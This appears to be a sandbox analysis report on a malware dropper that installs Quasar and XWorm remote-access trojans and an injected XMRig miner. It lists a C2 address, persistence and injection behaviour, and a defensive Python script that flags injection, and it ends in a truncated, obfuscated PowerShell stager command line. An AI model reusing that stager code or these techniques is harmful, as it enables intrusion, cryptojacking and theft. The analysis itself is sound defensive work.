Analysis
max time kernel: 150s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20250502-en
resource tags: arch:x64, arch:x86, image:win11-20250502-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 03/05/2025, 16:15
Static task: static1
Behavioral task: behavioral1
  Sample: primate protocol.exe
  Resource: win10v2004-20250502-en
Behavioral task: behavioral2
  Sample: primate protocol.exe
  Resource: win11-20250502-en
General
Target: primate protocol.exe
Size: 4.7MB
MD5: 28fccc4c460bbe5df088d182c156531c
SHA1: 0e4ff4e76b430ae326ff14d4e0e304b38497a9ab
SHA256: fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
SHA512: 49f8d5feb07aff5efc0d592cd7886e7da3a7a6069f64b8332d0696c2860b5376c34d8825fa6f3c8a6f5590de803b1e840cc41605d24199c9890e0d23d2f4fca8
SSDEEP: 49152:SmQvdtV2bnS7TKxxXf4cFefFbAbsW4H94VPxfAcGDtpZ4Bl6nQWPvkO8oiTa8qd+:SZtV2SsfHeW4HmVPG7RYBlUPvbAEba
Malware Config
Extracted
Family: quasar
Version: 1.6.0
Botnet (tag): client
C2: 174.61.118.194:4872
Mutex: eab25b68-ae09-4c5c-b42f-516771913f6f
Attr:
encryption_key: 4ECD6F0D7A0CD0888AC4DF40F22ECF5C3E76855B
install_name: sysprochost.exe
key_salt: 5a23f8394640cb9e40658446a04c0bbae82dc93d0470e1b2a406a90fd2520382
log_directory: ok
reconnect_delay: 3000
startup_key: HOST
Note: install_name (sysprochost.exe) and startup_key (HOST) are the values compiled into the Quasar client. No file with that name appears in the behavioral data below; the names seen on disk in this run (systemprocess.exe, host.exe, CompPkg.exe) are chosen by the dropper, see "Drops file in Windows directory".
Signatures
Detect Xworm Payload 4 IoCs
resource / yara_rule
behavioral2/files/0x001900000002b052-31.dat family_xworm
behavioral2/memory/3076-32-0x0000000000F10000-0x0000000000F7A000-memory.dmp family_xworm
behavioral2/memory/5608-899-0x0000000000820000-0x000000000088A000-memory.dmp family_xworm
behavioral2/memory/5208-922-0x0000000000180000-0x00000000001EA000-memory.dmp family_xworm
PIDs 3076, 5608 and 5208 are all CompPkg.exe (see "Executes dropped EXE"), so CompPkg.exe is the XWorm component.
Quasar family
Quasar payload 2 IoCs
resource / yara_rule
behavioral2/files/0x001a00000002b050-4.dat family_quasar
behavioral2/memory/5768-29-0x0000018E2D8D0000-0x0000018E2DA62000-memory.dmp family_quasar
PID 5768 is systemprocess.exe (see "Executes dropped EXE"), so systemprocess.exe is the Quasar client whose config is extracted above.
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description / pid / Process / procid_target
PID 5316 created 632 / 5316 / powershell.EXE / 5
PID 908 created 632 / 908 / powershell.EXE / 5
PID 632 is winlogon.exe (see Processes). The two dllhost.exe instances that powershell.EXE 5316 and 908 write into and set thread contexts in (see SetThreadContext and WriteProcessMemory below) appear under winlogon.exe in the process tree rather than under PowerShell, i.e. the stagers created them with a spoofed parent process.
Xmrig family
Xworm family
XMRig Miner payload 7 IoCs
resource / yara_rule
behavioral2/memory/2336-154-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral2/memory/2336-160-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral2/memory/2336-159-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral2/memory/2336-158-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral2/memory/2336-157-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral2/memory/2336-156-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
behavioral2/memory/2336-153-0x0000000140000000-0x0000000140835000-memory.dmp xmrig
All seven hits are the same 0x140000000-0x140835000 image inside PID 2336, which the EnumeratesProcesses and AdjustPrivilegeToken tables identify as dialer.exe; the miner was injected there by ijujdfuujtjk.exe (PID 1480, see SetThreadContext). The SeLockMemoryPrivilege that dialer.exe enables is the privilege XMRig needs for large-page memory.
Command and Scripting Interpreter: PowerShell 3 IoCs
pid / Process
5316 powershell.EXE
908 powershell.EXE
5664 powershell.exe
Creates new service(s) 2 TTPs
Stops running service(s) 4 TTPs
Drops startup file 2 IoCs
description / ioc / Process
File created / C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe / CompPkg.exe
File opened for modification / C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe / CompPkg.exe
Executes dropped EXE 7 IoCs
pid / Process
5768 systemprocess.exe
3016 host.exe
3076 CompPkg.exe
5776 CompPkg.exe
1480 ijujdfuujtjk.exe
5608 CompPkg.exe
5208 CompPkg.exe
systemprocess.exe, host.exe and CompPkg.exe are written to C:\Windows by primate protocol.exe (see "Drops file in Windows directory"); the report does not show where ijujdfuujtjk.exe comes from. The second CompPkg.exe instance (5776) is started by cmd.exe 5156 (see WriteProcessMemory).
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.
Adds Run key to start application 2 TTPs 1 IoCs
description / ioc / Process
Set value (str) / \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" / CompPkg.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
Drops file in System32 directory 2 IoCs
description / ioc / Process
File opened for modification / C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive / powershell.EXE
File opened for modification / C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive / powershell.EXE
StartupProfileData-NonInteractive is the cache PowerShell writes into the profile of the account it runs as; its location under systemprofile means the two powershell.EXE stagers run as LocalSystem, consistent with their parent being the Schedule service host in the process tree.
Suspicious use of SetThreadContext 6 IoCs
description / pid / Process / procid_target
PID 3016 set thread context of 848 / 3016 / host.exe / 112
PID 1480 set thread context of 5008 / 1480 / ijujdfuujtjk.exe / 134
PID 1480 set thread context of 5268 / 1480 / ijujdfuujtjk.exe / 135
PID 1480 set thread context of 2336 / 1480 / ijujdfuujtjk.exe / 136
PID 5316 set thread context of 4636 / 5316 / powershell.EXE / 139
PID 908 set thread context of 4396 / 908 / powershell.EXE / 140
Every one of these targets is also written to by the same source (see WriteProcessMemory), which is the process-hollowing / thread-hijack pattern: host.exe into 848, ijujdfuujtjk.exe into 5008, 5268 and 2336 (dialer.exe, where the XMRig image is found), and the two PowerShell stagers into dllhost.exe 4636 and 4396.
upx (yara rule) 12 IoCs
resource / yara_rule
behavioral2/memory/2336-154-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-160-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-159-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-158-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-157-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-156-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-153-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-152-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-151-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-148-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-150-0x0000000140000000-0x0000000140835000-memory.dmp upx
behavioral2/memory/2336-147-0x0000000140000000-0x0000000140835000-memory.dmp upx
The upx matches are on the same dialer.exe (PID 2336) region as the xmrig matches: the injected miner image is UPX-packed.
Drops file in Windows directory 3 IoCs
description / ioc / Process
File created / C:\Windows\CompPkg.exe / primate protocol.exe
File created / C:\Windows\systemprocess.exe / primate protocol.exe
File created / C:\Windows\host.exe / primate protocol.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system; the fourteen invocations here go with the "Creates new service(s)" and "Stops running service(s)" signatures above.
pid / Process
1512 sc.exe
896 sc.exe
1764 sc.exe
1992 sc.exe
2332 sc.exe
5740 sc.exe
4456 sc.exe
3200 sc.exe
6088 sc.exe
1560 sc.exe
1628 sc.exe
3408 sc.exe
5820 sc.exe
4848 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description / ioc / Process
Key opened / \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh / netsh.exe
Key queried / \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh / netsh.exe
Key value enumerated / \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh / netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description / ioc / Process
Key opened / \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language / primate protocol.exe
Key opened / \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language / powershell.exe
Key opened / \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language / powershell.exe
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid / Process
3128 netsh.exe
netsh.exe 3128 is launched by systemprocess.exe 5768, the Quasar client (see WriteProcessMemory); the Netsh Helper DLL registry reads above are this same process starting up, not a helper DLL being registered.
Modifies data under HKEY_USERS 64 IoCs
All of these keys live under HKU\.DEFAULT, the hive a LocalSystem process sees as HKCU: the powershell.EXE rows are the certificate-store keys PowerShell initialises on first use under the SYSTEM profile, and the OfficeClickToRun.exe rows are the sandbox's Office telemetry running in the background. Neither is attacker-controlled data; the value of this table is that it confirms the stagers run as SYSTEM.
description / ioc / Process
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs / powershell.EXE
Key deleted / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata / OfficeClickToRun.exe
Set value (str) / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs / powershell.EXE
Key deleted / \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 / OfficeClickToRun.exe
Set value (str) / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust / powershell.EXE
Set value (int) / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common / OfficeClickToRun.exe
Key created / \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs / powershell.EXE
Key created / \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot / powershell.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process
3340 schtasks.exe
4768 schtasks.exe
schtasks.exe 3340 is launched by systemprocess.exe 5768 (Quasar) and 4768 by CompPkg.exe 3076 (XWorm), see WriteProcessMemory; together with the Run key and Startup-folder entries above, each RAT sets up its own persistence.
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid / Process
5768 systemprocess.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid / Process (the 64 rows, grouped with counts)
1444 powershell.exe x2
2660 powershell.exe x2
5768 systemprocess.exe x3
5664 powershell.exe x2
3016 host.exe x10
1480 ijujdfuujtjk.exe x8
5316 powershell.EXE x3
908 powershell.EXE x3
2336 dialer.exe x6
4396 dllhost.exe x23
4636 dllhost.exe x2
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid / Process
3176 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 64 IoCs
Token / pid / Process (the 64 rows, grouped by privilege)
SeDebugPrivilege: 5768 systemprocess.exe, 3076 CompPkg.exe, 2660 powershell.exe, 1444 powershell.exe, 5776 CompPkg.exe, 5664 powershell.exe, 3016 host.exe, 5316 powershell.EXE (x2), 1480 ijujdfuujtjk.exe, 908 powershell.EXE (x2), 4396 dllhost.exe, 4636 dllhost.exe, 2248 wmiprvse.exe
SeLockMemoryPrivilege: 2336 dialer.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege: 3176 Explorer.EXE (repeated)
SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege: 2700 svchost.exe (repeated)
SeAuditPrivilege: 2220 svchost.exe, 2708 svchost.exe (x2)
SeDebugPrivilege being enabled by every dropped executable, both PowerShell stagers and the two injected dllhost.exe hosts fits the cross-process writes logged below; SeLockMemoryPrivilege on dialer.exe is the large-page privilege XMRig requests. The Explorer.EXE, svchost.exe and wmiprvse.exe rows are routine token adjustments by the OS itself.
Suspicious use of SetWindowsHookEx 1 IoCs
pid / Process
5768 systemprocess.exe
Suspicious use of WriteProcessMemory 64 IoCs
source PID (Process) -> target PID [procid_target], with the number of logged writes (the report lists each write as its own row)
1484 (primate protocol.exe) -> 2660 [82] x3
1484 (primate protocol.exe) -> 1444 [84] x3
1484 (primate protocol.exe) -> 5768 [86] x2
1484 (primate protocol.exe) -> 3016 [87] x2
1484 (primate protocol.exe) -> 3076 [88] x2
5768 (systemprocess.exe) -> 3340 [89] x2
3076 (CompPkg.exe) -> 4768 [91] x2
5156 (cmd.exe) -> 5776 [95] x2
5768 (systemprocess.exe) -> 3128 [98] x2
5768 (systemprocess.exe) -> 5664 [100] x2
3016 (host.exe) -> 848 [112] x6
1480 (ijujdfuujtjk.exe) -> 5008 [134] x6
1480 (ijujdfuujtjk.exe) -> 5268 [135] x9
1480 (ijujdfuujtjk.exe) -> 2336 [136] x5
5316 (powershell.EXE) -> 4636 [139] x8
908 (powershell.EXE) -> 4396 [140] x8
Read together with SetThreadContext: the writes by 1484 into the two powershell.exe instances (2660, 1444) and the three dropped executables, by 5768 into schtasks.exe 3340, netsh.exe 3128 and powershell.exe 5664, by 3076 into schtasks.exe 4768 and by 5156 into CompPkg.exe 5776 are parents starting children. The last six pairs (host.exe, ijujdfuujtjk.exe and the two PowerShell stagers) combine the write with SetThreadContext on the same target, which is injection rather than ordinary process creation.
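The SetThreadContext and WriteProcessMemory tables are most useful when correlated: a source that both writes into a target and sets a thread context there is the classic hollowing / thread-hijack footprint, whereas write-only pairs (the dropper 1484 handing start-up data to children it spawned) are a much weaker signal. The Python below is an added example, not part of this report or of any sandbox's code; it parses rows in the report's own wording (a constructed subset of the rows above, one line per distinct source/target pair) and separates the injection candidates from the write-only pairs.

```python
import re
from collections import defaultdict

# Constructed sample in the sandbox's row wording, one line per distinct
# source/target pair taken from the SetThreadContext and WriteProcessMemory
# tables of this report (the report repeats most pairs several times).
SAMPLE_EVENTS = """
PID 3016 set thread context of 848 3016 host.exe 112
PID 1480 set thread context of 5008 1480 ijujdfuujtjk.exe 134
PID 1480 set thread context of 5268 1480 ijujdfuujtjk.exe 135
PID 1480 set thread context of 2336 1480 ijujdfuujtjk.exe 136
PID 5316 set thread context of 4636 5316 powershell.EXE 139
PID 908 set thread context of 4396 908 powershell.EXE 140
PID 1484 wrote to memory of 2660 1484 primate protocol.exe 82
PID 1484 wrote to memory of 5768 1484 primate protocol.exe 86
PID 5768 wrote to memory of 3128 5768 systemprocess.exe 98
PID 3016 wrote to memory of 848 3016 host.exe 112
PID 1480 wrote to memory of 5008 1480 ijujdfuujtjk.exe 134
PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135
PID 1480 wrote to memory of 2336 1480 ijujdfuujtjk.exe 136
PID 5316 wrote to memory of 4636 5316 powershell.EXE 139
PID 908 wrote to memory of 4396 908 powershell.EXE 140
"""

# Row layout: "PID <src> <op> <dst> <src again> <image, may contain spaces> <target index>"
_ROW = re.compile(
    r"^PID (\d+) (set thread context of|wrote to memory of) (\d+) \d+ (.+?) (\d+)$"
)


def parse_events(text):
    """Turn report rows into dicts; lines that do not match the layout are ignored."""
    events = []
    for line in text.strip().splitlines():
        m = _ROW.match(line.strip())
        if m:
            events.append({"src": int(m.group(1)), "op": m.group(2),
                           "dst": int(m.group(3)), "image": m.group(4)})
    return events


def _index(events):
    """Per source PID: set of targets written to, set of targets with a context set."""
    writes, ctx, image = defaultdict(set), defaultdict(set), {}
    for e in events:
        image[e["src"]] = e["image"]
        bucket = writes if e["op"].startswith("wrote") else ctx
        bucket[e["src"]].add(e["dst"])
    return writes, ctx, image


def injection_candidates(events):
    """(src, image, dst) triples where src both wrote into dst and set a thread
    context in it: WriteProcessMemory plus SetThreadContext on the same target is
    the process-hollowing / thread-hijack footprint."""
    writes, ctx, image = _index(events)
    return [(src, image[src], dst)
            for src in sorted(ctx)
            for dst in sorted(ctx[src] & writes[src])]


def write_only(events):
    """Targets that were written to but never had a context set. For a parent that
    spawned the target this is usually just process start-up: keep it, but rank it
    below the candidates above."""
    writes, ctx, _ = _index(events)
    return {src: sorted(dsts - ctx[src])
            for src, dsts in writes.items() if dsts - ctx[src]}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for src, image, dst in injection_candidates(evs):
        print(f"injection candidate: {src} ({image}) -> {dst}")
    for src, dsts in write_only(evs).items():
        print(f"write-only (likely process start-up): {src} -> {dsts}")
```

On the constructed rows this flags host.exe 3016 -> 848, ijujdfuujtjk.exe 1480 -> 2336/5008/5268 and the two PowerShell stagers -> dllhost.exe, and leaves primate protocol.exe and systemprocess.exe in the write-only bucket.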
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
depth | image path | command line | PID (depth 1 entries are tree roots; a deeper entry is a child of the nearest shallower entry above it)
1 | C:\Windows\system32\winlogon.exe | winlogon.exe | PID 632
  2 | C:\Windows\system32\dwm.exe | "dwm.exe" | PID 460
  2 | C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{09f4a227-cef4-4b5d-ba7b-580721731d4e} | PID 4636
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  2 | C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{c3f2fd93-4d00-463c-bd0a-7536c6c18483} | PID 4396
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
1 | C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID 688
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID 992
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID 432
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID 768
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc | PID 1068
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID 1076
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID 1156
The two dllhost.exe instances sit under winlogon.exe (PID 632) in the tree, yet they are the processes that powershell.EXE 5316 and 908 write into and set thread contexts in (see the signatures above); together with the NtCreateUserProcessOtherParentProcess hits this shows the stagers created them with a spoofed parent. The powershell.EXE entry that follows is a child of the Schedule service host (PID 1156), i.e. it is launched by a scheduled task.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rWNoSHwYnwkI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qNbyexdlHPgKWO,[Parameter(Position=1)][Type]$pGJLtrOUxb)$PTQAtKeJiqS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+'t'+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+'m'+''+[Char](111)+'r'+'y'+'M'+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+'ate'+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PTQAtKeJiqS.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$qNbyexdlHPgKWO).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+'na'+'g'+''+[Char](101)+'d');$PTQAtKeJiqS.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)